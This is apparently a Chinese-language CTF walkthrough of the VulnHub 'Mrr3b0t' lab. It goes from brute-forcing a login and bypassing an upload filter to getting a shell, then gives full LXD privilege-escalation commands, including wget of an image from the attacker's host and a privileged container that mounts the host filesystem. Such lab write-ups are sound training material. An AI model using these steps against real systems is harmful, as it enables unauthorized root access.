VulnHub靶场之Bizarre Adventure: Mrr3b0t
扫描IP以及端口:
访问80,一个模板网站,,,扫描目录:
不可描述的flag.txt.txt,去看看:
没找到,去看看administrator,尝试弱密码,登陆失败,没有用户名密码错误提升啥的:
继续寻找flag.txt.txt提示的hidden,,,再images中找到一个名叫hidden的图片:
去在线解密一下:
得到一个用户名mrrobot,需要进行暴力破解,,,
直接用bp抓包进行破解,这里我使用的是rockyou.txt,1000多万的字典,,,:
登录:
文件上传,,,,过滤了:The image format must be jpg,jpeg,gif,png
抓包进行修改:
就是上传到administrator目录下,访问,监听,,
获取到shell,,获取交互式shell:
查看用户存在一个exploiter用户:
继续查找可用文件,,找到一个buffer:
不会吧不会吧,不会又是pwn之类的吧,,strings查看一下:
找到一个密码,su expoliter:
sudo -l查看一下,不能运行sudo,,:
id看看,有lxd,,,可以尝试lxd提权:
具体方法请看这篇文章:Lxd Privilege Escalation
先在本地执行如下命令:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
一开始一直failed,之后更新一下kali就好了:
可以看在目录下生成一个tar.gz文件:
上传到shell服务器上,,,
服务器上下载:
cd /tmp
wget http://192.168.1.10:8000/apline-v3.12-x86_64-20201004_1015.tar.gz
生成映像后,可以将其作为映像添加到LXD中:
lxc image import ./apline-v3.12-x86_64-20201004_1015.tar.gz --alias myimage
使用list命令检查镜像列表:
lxc image list
继续执行命令:
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
成功获取到flag:
小结
几经波折,,,学到了许多东西,首先收获最大的就是lxd提权,第一次做,
找了很多文章,错误百出,不过好在最后解决了,,遇见问题不要慌张,慢慢去解决
曾经提权这一部分几度想放弃了,,,,lxd提权这部分需要消化理解吸收,还需加强自身实力